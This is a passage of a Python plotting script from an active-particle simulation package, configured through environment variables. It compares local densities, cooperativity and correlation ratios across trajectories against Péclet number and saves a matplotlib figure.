Trajectory variable transition value in order of trajectory.
NOTE: A vertical line is displayed at the corresponding Péclet number.
FIXED_VAR (mandatory) : float separated by ':'
Fixed variable value in order of trajectory.
DENSITIES (mandatory) : float separated by ':'
Packing fractions of particles in order of trajectory.
INITIAL_FRAME_PHILOC : int
Frame to consider as initial in local densities calculations.
DEFAULT: active_particles.plot.pphiloc._init_frame
INTERVAL_MAXIMUM_PHILOC : int
Maximum number of frames on which densities are calculated.
DEFAULT: active_particles.plot.pphiloc._int_max
BOX_SIZE_PHILOC : float
Length of the square boxes in which particles are counted.
DEFAULT: active_particles.plot.pphiloc._box_size
N_CASES_PHILOC : int
Number of boxes in each direction in which local densities are computed.
DEFAULT: active_particles.plot.pphiloc._Ncases
N_BINS : int
Number of bins for the local densities histogram.
DEFAULT: active_particles.plot.pphiloc._Nbins
PHIMAX : float
Maximum local density for the local densities histogram.
DEFAULT: active_particles.plot.pphiloc._phimax
BOX_SIZE_COR : float
Size of the square box which was considered for correlations.
DEFAULT: simulation box size
X_ZERO : float
Centre of the of the box x-coordinate for correlations.
DEFAULT: 0
Y_ZERO : float
Centre of the of the box y-coordinate for correlations.
DEFAULT: 0
INITIAL_FRAME_COR : int
Frame to consider as initial for correlations.
DEFAULT: active_particles.plot.chi_msd._init_frame_cor
INTERVAL_MAXIMUM_COR : int
Maximum number of intervals of length dt considered for correlations.
DEFAULT: active_particles.plot.chi_msd._int_max_cor
N_CASES_COR : int
Number of boxes in each direction with which the displacement grid is
computed.
DEFAULT: active_particles.plot.chi_msd._Ncases_cor
R_MIN : float
Minimum radius for correlations integration.
DEFAULT: active_particles.plot.chi_msd._r_min
R_MAX : float
Maximum radius for correlations integration.
DEFAULT: active_particles.plot.chi_msd._r_max
FONT_SIZE : int
Plot font size.
DEFAULT: active_particles.plot.comparison._font_size
MARKER_SIZE : int
Plot marker size.
DEFAULT: active_particles.plot.comparison._marker_size
COLORMAPS : string separated by ':'
Plot colormaps to choose from.
DEFAULT: active_particles.plot.comparison._colormaps
RATIO_LEGEND : float
Width ratio between legend and figure.
DEFAULT: active_particles.plot.comparison._ratio_legend
WSPACE : float
Plots width space.
DEFAULT: active_particles.plot.comparison._wspace
HSPACE : float
Plots height space.
DEFAULT: active_particles.plot.comparison._hspace
X_SCALE : string
Plots x-scale.
DEFAULT: active_particles.plot.comparison._x_scale
PHILOC_YS : string
Most probable local density y-scale.
DEFAULT: active_particles.plot.comparison._philoc_ys
CHI_YS : string
Maximum cooperativity y-scale.
DEFAULT: active_particles.plot.comparison._chi_ys
DT_YS : string
Time of maximum cooperativity y-scale.
DEFAULT: active_particles.plot.comparison._dt_ys
RATIOTL_YS : string
Ratio of transversal and longitudinal correlations y-scale.
DEFAULT: active_particles.plot.comparison._ratioTL_ys
Output
------
> Saves figure to IMAGE_NAME.
[SHOW mode]
> Displays plot.
"""
import active_particles.naming as naming
from active_particles.init import get_env, get_env_list
from os import environ as envvar
if __name__ == '__main__': envvar['SHOW'] = 'True'
from os.path import join as joinpath
from active_particles.plot.plot import list_colormap, list_markers,\
list_linestyles
from active_particles.plot.pphiloc import Philoc,\
_init_frame as _init_frame_philoc, _int_max as _int_max_philoc,\
_box_size as _box_size_philoc, _Ncases as _Ncases_philoc,\
_Nbins, _phimax
from active_particles.plot.chi_msd import ChiMsd,\
_init_frame_cor, _int_max_cor, _Ncases_cor, _r_min, _r_max
from active_particles.plot.corlcort import CLCT
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
from matplotlib.lines import Line2D
# DEFAULT VARIABLES
_N = int(1e5) # default number of particles
_font_size = 25 # default plot font size
_marker_size = 20 # default plot marker size
_colormaps = ('cool', 'hot') # default plot colormaps
_wspace = 0.4 # default plot width space
_hspace = 0.05 # default plot height space
_ratio_legend = 2 # default width ratio between graphs and legends
_x_scale = 'log' # default plots x-scale
_philoc_ys = 'linear' # default most probable local density y-scale
_chi_ys = 'log' # default maximum cooperativity y-scale
_dt_ys = 'log' # default time of maximum cooperativity y-scale
_ratioTL_ys = 'linear' # default ratio of transversal and longitudinal correlations y-scale
_image_name = joinpath(get_env('HOME'), 'comparison.eps') # default image file name
# SCRIPT
if __name__ == '__main__': # executing as script
# VARIABLES DEFINITIONS
var = get_env_list('VARIABLES') # plot variables
var_min = get_env_list('VAR_MIN', vartype=float) # minimum values of plot variable
var_max = get_env_list('VAR_MAX', vartype=float) # maximum values of plot variable
var_c = get_env_list('VAR_C', vartype=float) # plot variable transition value
fixed_var = get_env_list('FIXED_VAR', vartype=float) # values of fixed variables
densities = get_env_list('DENSITIES', vartype=float) # packing fractions of particles
if not(len(var) == len(var_min) == len(var_max) == len(fixed_var)
== len(var_c) == len(densities)):
raise IndexError(
'VARIABLES, VAR_MIN, VAR_MAX, VAR_C, FIXED_VAR and DENSITIES \
must have equal lengths.')
comparisons = len(var) # number of trajectories to compare
var_label = [] # variables labels
fix_label = [] # fixed variable labels
var_attribute = [] # variables attribute to be displayed in file names
pe_func = [] # Péclet number as function of plot variable
for index in range(comparisons):
if var[index] == 'dr':
var_label += ['\\tilde{\\nu}_r']
fix_label += ['\\tilde{v}']
var_attribute += [{'vzero': fixed_var[index]}]
pe_func += [(lambda index: lambda x: fixed_var[index]/x)(index)]
elif var[index] == 'vzero':
var_label += ['\\tilde{v}']
fix_label += ['\\tilde{\\nu}_r']
var_attribute += [{'dr': fixed_var[index]}]
pe_func += [(lambda index: lambda x: x/fixed_var[index])(index)]
else: raise ValueError('Variable %s is not known.' % var[index])
cor = get_env('CORRELATION', default='Cuu') # correlation variable
if cor == 'Cuu': # cooperativities from
naming_cor = naming.Cuu() # correlations naming object
cor_name = 'C_{uu}' # correlations name
elif cor == 'Cww':
naming_cor = naming.Cww() # correlations naming object
cor_name = 'C_{\\delta u \\delta u}' # correlations name
elif cor == 'Cdd':
naming_cor = naming.Cdd() # correlations naming object
cor_name = 'C_{|u||u|}' # correlations name
elif cor == 'Cee':
naming_cor = naming.Cee() # correlations naming object
cor_name = 'C_{\\hat{u}\\hat{u}}' # correlations name
else: raise ValueError('Correlation %s is not known.' % cor) # correlation is not known
data_dir = get_env('DATA_DIRECTORY', default=naming.sim_directory) # data directory
excluded_directories = get_env('EXCLUDE', default='') # directories to exclude
parameters_file = get_env('PARAMETERS_FILE',
default=naming.parameters_file) # simulations parameters file name
N = get_env('N', default=_N, vartype=int) # number of particles
init_frame_philoc = get_env('INITIAL_FRAME_PHILOC',
default=_init_frame_philoc, vartype=int) # frame to consider as initial in local densities calculations
int_max_philoc = get_env('INTERVAL_MAXIMUM_PHILOC',
default=_int_max_philoc, vartype=int) # maximum number of frames on which densities are calculated
box_size_philoc = get_env('BOX_SIZE_PHILOC',
default=_box_size_philoc, vartype=float) # length of the square boxes in which particles are counted
Ncases_philoc = get_env('N_CASES_PHILOC',
default=_Ncases_philoc, vartype=int) # number of boxes in each direction in which local densities are computed
Nbins = get_env('N_BINS', default=_Nbins, vartype=int) # number of bins for the local densities histogram
phimax = get_env('PHIMAX', default=_phimax, vartype=float) # maximum local density for the local densities histogram
box_size_cor = get_env('BOX_SIZE_COR', vartype=float) # size of the square box which was considered for correlations
centre_cor = (get_env('X_ZERO', default=0, vartype=float),
get_env('Y_ZERO', default=0, vartype=float)) # centre of the box for correlations
init_frame_cor = get_env('INITIAL_FRAME_COR',
default=_init_frame_cor, vartype=int) # frame to consider as initial for correlations
int_max_cor = get_env('INTERVAL_MAXIMUM_COR',
default=_int_max_cor, vartype=int) # maximum number of intervals of length dt considered for correlations
Ncases_cor = get_env('N_CASES_COR', default=_Ncases_cor, vartype=int) # number of boxes in each direction with which the displacement grid is computed
r_min = get_env('R_MIN', default=_r_min, vartype=float) # minimum radius for correlations integration
r_max = get_env('R_MAX', default=_r_max, vartype=float) # maximum radius for correlations integration
# NAMING
attributes_philoc = {'N': N, 'init_frame': init_frame_philoc,
'int_max': int_max_philoc, 'Ncases': Ncases_philoc,
'box_size': box_size_philoc} # attributes displayed in local densities file names
attributes_cor = {'N': N, 'init_frame': init_frame_cor,
'int_max': int_max_cor, 'Ncases': Ncases_cor, 'box_size': box_size_cor,
'x_zero': centre_cor[0], 'y_zero': centre_cor[1]} # attributes displayed in correlations file names
naming_varN = naming.VarN() # varN naming object
naming_simdir = naming.AHB2D() # simulation directory naming object
# PLOT PARAMETERS
font_size = get_env('FONT_SIZE', default=_font_size, vartype=float) # plot font size
marker_size = get_env('MARKER_SIZE', default=_marker_size, vartype=int) # plot marker size
mpl.rcParams.update({'font.size': font_size,
'lines.markersize': marker_size})
colormaps = get_env_list('COLORMAPS') # plot colormaps
if colormaps == []: colormaps = _colormaps # no plot colormaps provided, use default
while len(colormaps) < comparisons: colormaps += colormaps # at least as much colormaps as trajectories to compare
ratio_legend = get_env('RATIO_LEGEND',
default=_ratio_legend, vartype=float) # width ratio between graphs and legends
wspace = get_env('WSPACE', default=_wspace, vartype=float) # plots width space
hspace = get_env('HSPACE', default=_hspace, vartype=float) # plots height space
x_scale = get_env('X_SCALE', default=_x_scale) # plots x-scale
philoc_ys = get_env('PHILOC_YS', default=_philoc_ys) # most probable local density y-scale
chi_ys = get_env('CHI_YS', default=_chi_ys) # maximum cooperativity y-scale
dt_ys = get_env('DT_YS', default=_dt_ys) # time of maximum cooperativity y-scale
ratioTL_ys = get_env('RATIOTL_YS', default=_ratioTL_ys) # ratio of transversal and longitudinal correlations y-scale
multiply_with_dr = get_env('DRDT', default=True, vartype=bool) # plot dr*dt rather than dt
if multiply_with_dr:
dt_label = r'$\tilde{\nu}_r \Delta t^*$' # dt label
else: dt_label = r'$\Delta t^*$' # dt label
# CALCULATION
philoc = [] # local densities histogram calculators
chimsd = [] # cooperativities calculators
clct = [] # longtidunal and transversal correlations calculators
for v, vmin, vmax, phi, vattribute\
in zip(var, var_min, var_max, densities, var_attribute):
philoc += [Philoc(data_dir, naming_simdir,
{'density': phi, **vattribute, **attributes_philoc},
parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
philoc[-1].calculate(naming_varN,
{'density': phi, **vattribute, **attributes_philoc}, Nbins, phimax)
chimsd += [ChiMsd(data_dir, naming_simdir,
{'density': phi, **vattribute, **attributes_cor},
parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
chimsd[-1].calculate(naming_cor,
{'density': phi, **vattribute, **attributes_cor}, r_min, r_max,
box_size=box_size_cor, multiply_with_dr=multiply_with_dr)
clct += [CLCT(data_dir, naming_simdir,
{'density': phi, **vattribute, **attributes_cor},
parameters_file, v, vmin, vmax, excluded_dir=excluded_directories)]
clct[-1].calculate(naming_cor,
{'density': phi, **vattribute, **attributes_cor},
multiply_with_dr=multiply_with_dr)
clct[-1].calculate_max(chimsd[-1].dtmax)
# PLOT
colors = list(map(
lambda philoc_traj, chimsd_traj, clct_traj, cmap:
list_colormap(
sorted(philoc_traj.var_list + chimsd_traj.var_list +
clct_traj.var_list),
colormap=cmap),
*(philoc, chimsd, clct, colormaps))) # plot colors hash tables
markers = list(map(
lambda philoc_traj, chimsd_traj, clct_traj:
list_markers(
sorted(philoc_traj.time_step_list + chimsd_traj.time_step_list
+ clct_traj.time_step_list)),
*(philoc, chimsd, clct))) # plot markers hash tables
linestyles = list_linestyles(range(comparisons)) # Péclet transition values vertical lines
fig = plt.figure()
fig.set_size_inches(30, 30)
fig.subplots_adjust(wspace=wspace)
fig.subplots_adjust(hspace=hspace)
fig.suptitle(
r'$N=%.2e$' % N + '\n' + r'$[%s]:$' % cor_name
+ r'$S_{init}=%.2e, S_{max}=%.2e,$' % (init_frame_cor, int_max_cor)
+ r'$N_{cases}=%.2e, r_{min}=%.2e,$' % (Ncases_cor, r_min)
+ r'$r_{max}=%.2e$' % r_max + '\n'
+ r'$[\phi^*_{loc}]: S_{init}=%.2e,$' % init_frame_philoc
+ r'$S_{max}=%.2e, N_{cases}=%.2e,$' % (int_max_philoc, Ncases_philoc)
+ r'$r_{max}=%.2e$' % box_size_philoc)
gs = GridSpec(4, 1 + comparisons,
width_ratios=[1] + comparisons*[1/(comparisons*ratio_legend)])
ax_philoc = plt.subplot(gs[0, 0])
ax_philoc.set_xscale(x_scale)
ax_philoc.set_yscale(philoc_ys)
ax_philoc.set_ylabel(r'$\phi^*_{loc}$')
ax_chi = plt.subplot(gs[1, 0])
ax_chi.set_xscale(x_scale)
ax_chi.set_yscale(chi_ys)
ax_chi.set_ylabel(r'$\chi(\Delta t^*) = \frac{1}{L^2}$'
+ r'$\int_{r=r_{min}}^{r=r_{max}} dr 2 \pi r %s(r, \Delta t^*)$'
% cor_name)
ax_dt = plt.subplot(gs[2, 0])
ax_dt.set_xscale(x_scale)
ax_dt.set_yscale(dt_ys)
ax_dt.set_ylabel(dt_label)
ax_ratioTL = plt.subplot(gs[3, 0])
ax_ratioTL.set_xscale(x_scale)
ax_ratioTL.set_xlabel(r'$Pe$')
ax_ratioTL.set_yscale(ratioTL_ys)
ax_ratioTL.set_ylabel(r'$%s^T/%s^L(\Delta t^*)$' % (cor_name, cor_name))
plt.setp(
[ax.get_xticklabels() for ax in [ax_philoc, ax_chi, ax_dt]],
visible=False)
axes_legend = [plt.subplot(gs[:, 1 + traj]) for traj in range(comparisons)]
for (phi, f_label, f_var, c_label, c_var, x_func, philoc_traj, chimsd_traj,
clct_traj, colors_traj, markers_traj, linestyle, ax_legend)\
in zip(densities, fix_label, fixed_var, var_label, var_c, pe_func,
philoc, chimsd, clct, colors, markers, linestyles.values(),
axes_legend):
x_func_var_c = x_func(c_var)
ax_philoc.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in philoc_traj.philocmax:
var_value = philoc_traj.var_hash[dir]
ax_philoc.scatter(
x_func(var_value), philoc_traj.philocmax[dir],
color=colors_traj[var_value],
marker=markers_traj[philoc_traj.time_step[dir]])
ax_chi.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in chimsd_traj.chimax:
if not(chimsd_traj.isinvarinterval[dir]): continue
var_value = chimsd_traj.var_hash[dir]
ax_chi.scatter(
x_func(var_value), chimsd_traj.chimax[dir],
color=colors_traj[var_value],
marker=markers_traj[chimsd_traj.time_step[dir]])
ax_dt.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in chimsd_traj.dtmax:
if not(chimsd_traj.isinvarinterval[dir]): continue
var_value = chimsd_traj.var_hash[dir]
ax_dt.scatter(
x_func(var_value), chimsd_traj.dtmax[dir],
color=colors_traj[var_value],
marker=markers_traj[chimsd_traj.time_step[dir]])
ax_ratioTL.axvline(x_func_var_c, color='black', linestyle=linestyle)
for dir in clct_traj.ratioTL_max:
var_value = clct_traj.var_hash[dir]
ax_ratioTL.scatter(
x_func(var_value), clct_traj.ratioTL_max[dir],
color=colors_traj[var_value],
marker=markers_traj[clct_traj.time_step[dir]])
legend = [
Line2D([0], [0], lw=0,
label=r'$\phi=%1.2f, %s=%.1e$' % (phi, f_label, f_var)),
Line2D([0], [0], lw=0),
Line2D([0], [0], linestyle=linestyle, color='black',
label=r'$%s = %.1e$' % (c_label, c_var)),
Line2D([0], [0], lw=0)]
legend += list(map(
lambda var_value: Line2D([0], [0],
color=colors_traj[var_value],
label=r'$%s = %.1e$' % (c_label, var_value)),
colors_traj))
legend += [Line2D([0], [0], lw=0)]
legend += list(map(
lambda time_step: Line2D([0], [0], lw=0, color='black',
marker=markers_traj[time_step],
label=r'$dt = %.1e$' % time_step),
markers_traj))
ax_legend.axis('off')
ax_legend.legend(handles=legend, loc='center')
# SAVING
fig.savefig(get_env('IMAGE_NAME', default=_image_name))
# SHOW
if get_env('SHOW', default=True, vartype=bool): plt.show()
| 44.172888 | 156 | 0.677059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11,247 | 0.500133 |